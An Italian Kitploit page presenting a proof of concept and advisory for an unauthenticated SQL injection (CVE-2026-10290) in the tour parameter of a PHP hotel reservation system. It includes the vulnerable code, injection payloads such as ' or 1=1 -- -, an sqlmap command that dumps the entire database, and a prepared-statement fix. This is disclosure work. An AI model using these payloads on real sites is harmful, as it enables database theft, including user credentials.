Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10290-SQLI — Prova di concetto per SQL injection non autenticata in Hotel and Tourism Reservation System 1.0, che dimostra l'estrazione del database tramite il parametro tour. | Kitploit
Strumenti/GitHubGitHub/xmyronn/cve-2026-10290-sqli
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHubxmyronn/cve-2026-10290-sqli

CVE-2026-10290-SQLI

Prova di concetto per SQL injection non autenticata in Hotel and Tourism Reservation System 1.0, che dimostra l'estrazione del database tramite il parametro tour.

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sistema di Prenotazione Hotel e Turismo - SQL Injection non autenticata in tour.php

Dettagli della Vulnerabilità

CampoDettagli
TitoloHotel and Tourism Reservation System - SQL Injection via parametro GET tour
Vendorcode-projects.org
Vendor URLhttps://code-projects.org/hotel-and-tourism-reservation-in-php-with-source-code/
ProdottoHotel and Tourism Reservation System
Versione1.0
Tipo di VulnerabilitàSQL Injection
CWECWE-89
Punteggio CVSS9.8 (Critico)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
File Affetto/ht/tour.php
Parametro Affettotour (GET)
Autenticazione RichiestaNo
Sfruttabile da RemotoSì
RicercatoreSyed Imad Uddin Alvi

Descrizione

Una vulnerabilità critica di SQL Injection esiste nel parametro GET tour di tour.php in Hotel and Tourism Reservation System 1.0. Il parametro viene passato direttamente in una query SQL grezza senza alcuna sanificazione, prepared statements o validazione dell'input. Un attaccante remoto non autenticato può manipolare la query per estrarre, modificare o eliminare qualsiasi dato nel database. La vulnerabilità è stata confermata tramite un dump completo del database utilizzando sqlmap.

Codice vulnerabile in tour.php:

root@kitploit:~
if(isset($_GET['tour'])) {
    $tourID = $_GET['tour'];
    $select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $s = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");
    $data = mysqli_fetch_assoc($s);

$tourID viene preso direttamente da $_GET['tour'] e interpolato nella query SQL senza alcuna sanificazione.


Passaggi per la Riproduzione

Configurazione: Installa Hotel and Tourism Reservation System 1.0 su XAMPP e accedi a http://<target>/ht/

Passo 1 — Visita una qualsiasi pagina tour come utente non autenticato:

root@kitploit:~
http://<target>/ht/tour.php?tour=4
Screenshot 2026-05-12 001635

Passo 2 — Inietta un apice singolo per rompere la query SQL e confermare la vulnerabilità:

root@kitploit:~
http://<target>/ht/tour.php?tour='

Risultato: Viene lanciato un errore fatale MySQL — confermando che l'input non sanificato raggiunge la query SQL.

Screenshot 2026-05-12 001643

Passo 3 — Conferma la SQLi con un payload basato su booleani:

root@kitploit:~
http://<target>/ht/tour.php?tour=' or 1=1 -- -

Risultato: La pagina carica normalmente con i dati del tour — injection booleana riuscita.

Screenshot 2026-05-12 001654

Passo 4 — Dump dell'intero database usando sqlmap:

root@kitploit:~
sqlmap -r sqli.txt --dump --batch

Risultato: sqlmap scarica con successo tutte le tabelle in hotel_db inclusi users, rooms, tour_reserves, gallery — compromissione completa del database confermata.

Screenshot 2026-05-12 001722

Impatto

Un attaccante remoto non autenticato può:

  • Estrarre tutti i dati dal database inclusi credenziali utente, email, numeri di telefono e dettagli delle prenotazioni
  • Eludere l'autenticazione estraendo le credenziali dell'amministratore
  • Modificare o eliminare qualsiasi record del database
  • Potenzialmente ottenere Esecuzione di Codice Remoto tramite INTO OUTFILE se i privilegi sui file sono concessi

Causa Principale

Il parametro GET tour viene interpolato direttamente in una query SQL grezza senza l'uso di prepared statements, query parametrizzate o sanificazione dell'input:

root@kitploit:~
// VULNERABLE
$tourID = $_GET['tour'];
$select = $db->query("SELECT * FROM tourism WHERE id = '{$tourID}' ");

// FIXED — use prepared statements
$stmt = $db->prepare("SELECT * FROM tourism WHERE id = ?");
$stmt->bind_param("i", $_GET['tour']);
$stmt->execute();

Riferimenti

  • CWE-89: Neutralizzazione Impropria di Elementi Speciali usati in un Comando SQL
  • OWASP: SQL Injection
  • Hotel and Tourism Reservation System — code-projects.org

Scoperto Da

Syed Imad Uddin Alvi — Ricercatore di Sicurezza Indipendente

Scarica lo strumento